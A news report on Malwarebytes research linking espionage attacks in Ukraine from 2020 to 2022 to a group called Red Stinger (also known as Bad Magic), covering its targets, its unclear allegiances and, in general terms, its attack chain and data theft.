Several advanced persistent threat attacks carried out across Ukraine between 2020 and 2022 have been linked to the same group of actors: a mystery entity whose allegiances are unclear.
Malwarebytes published a blog post on Wednesday detailing attacks it attributes to the group, dubbed Red Stinger.
It said Red Stinger was the same group Kaspersky recently revealed as being behind attacks last year on government, agriculture, and transportation organizations in Donetsk, Lugansk, and Crimea. Kaspersky calls the group Bad Magic.
Malwarebytes’ research found Red Stinger/Bad Magic’s attacks stretched back to 2020, and occurred in centers other than just Donetsk, Lugansk, and Crimea (which was annexed by Russia in 2014).
“Military, transportation and critical infrastructure were some of the entities being targeted, as well as some involved in the September  East Ukraine referendums,” the post said.
“Depending on the campaign, attackers managed to exfiltrate snapshots, USB drives, keyboard strokes, and microphone recordings.”
The researchers said because of the contrasting nature of the attacks they have linked to the group, they couldn’t attribute Red Stinger to a specific country.
“Any of the involved countries [in the Russia/Ukraine war] or aligned groups could be responsible, as some victims were aligned with Russia, and others were aligned with Ukraine,” the blog stated.
An example of the baffling diversity of the targets of Red Stinger’s attacks occurred in September last year when Russia held referendums in Luhansk, Donetsk, Zaporizhzhia and Kherson seeking support for its occupation.
The group targeted several election officials involved in the Russian referendums, but during the same operation it also targeted a Ukrainian library in the city of Vinnytsia.
“What is clear is that the principal motive of the attack was surveillance and data gathering. The attackers used different layers of protection, had an extensive toolset for their victims, and the attack was clearly targeted at specific entities,” the researchers wrote.
“Perhaps in the future, further events or additional activity from the group can shed light on the matter.”
The researchers also uncovered evidence that, at some point, Red Stinger had infected its own machines. It was unclear whether that had been done by mistake or to carry out testing, they said, although the group’s use of the names TstSCR and TstVM to identify two of its victims possibly suggested the action was a test.
Red Stinger’s attack chain involves using malicious installer files to activate DBoxShell—malware that utilizes cloud storage services as a command-and-control mechanism—onto compromised Windows machines.
A Microsoft Software Installer (MSI) file is downloaded through a Windows shortcut file contained within a ZIP archive.
“This stage serves as an entry point for the attackers, enabling them to assess whether the targets are interesting or not, meaning that in this phase they will use different tools,” the researchers said.
In the exfiltration phase of its operations, Red Stinger has used custom tools to steal data which may include a combination of screenshots, content from USB drives, keystroke logs and microphone recordings. The exfiltration phase of Red Stinger’s attacks has been known to last up to several months.